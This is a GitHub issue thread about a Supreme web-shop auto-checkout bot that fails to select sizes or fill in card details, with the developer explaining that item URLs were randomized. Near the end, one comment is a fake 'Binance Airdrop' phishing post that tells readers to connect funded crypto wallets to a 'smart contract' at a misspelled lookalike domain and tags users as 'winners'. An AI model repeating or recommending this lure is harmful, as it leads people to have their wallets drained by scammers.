### ISSUE TITLE
Not entering card info/not selecting size

### ISSUE THREAD

**Issue by YoungPup** [Chrakimnas6/CH-Supreme-Bot#1]
So there's 2 issues (3, but I figured out how to get past that one, which was: in the "keyword" part, you have to add dashes in between words, which seems unnecessary), the bot won't select a size, no matter how I enter it in the bot (all lowercase, all uppercase, first letter uppercase), and the same with the card info, no matter how I enter it, it doesn't enter the card number or CVV (it does enter the expiration date though)

**Comment by Chrakimnas6** [comment]
Oh I think Supreme made some changes on their website. Because it works at the beginning (June, 2015) and I got Yankee box logo tee by this. Maybe I need to take some time to look over again.

**Comment by YoungPup** [comment]
I'd super appreciate that, I'm hoping to maybe get something from this upcoming drop

**Comment by YoungPup** [comment]
Any chance you'll get a chance to look at this before the release? I know a group who would buy this.

**Comment by YoungPup** [comment]
Really hoping you can take a look at this before the 25th

**Comment by Chrakimnas6** [comment]
Yeah I feel you since 16ss will start on 25th. Now the problem is that they temporarily close the online shop so I don't have access to it and have no way to find what is going on. Really sorry about that, I'm appreciate someone find this extension here and provide suggestions.

**Comment by Ifiwonthelotto12** [comment]
Is this bot looking at the href link? Because that will not work anymore. Or is it looking inside of each item on Supremes page?

**Comment by Chrakimnas6** [comment]
yeah It used to be like "http://www.supremenewyork.com/shop/t-shirts/xxx-tee/white" which is easy to predict, then they changed it into something like"kuc43nv72" which I don't know how to decode or encode

**Comment by Ifiwonthelotto12** [comment]
You can not decode that, it is absolutely randomized. However you could ask the title from every link, and in the title will say what kind of item it is e.g like morrissey http://i.imgur.com/0k3twnt.png

I am just a starting coder, so I wouldn't have  a clue how to do it :P It is possible tho.
https://i.imgur.com/44LdlAV.jpg

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @sharp, @SuperCipher, @zgayjjf, @fullkomnun, @0xBADDCAFE, @Basheer-alsyani, @kamalbuilds

**Comment by Basheer-alsyani** [comment]
VR8649ZEEG4UL
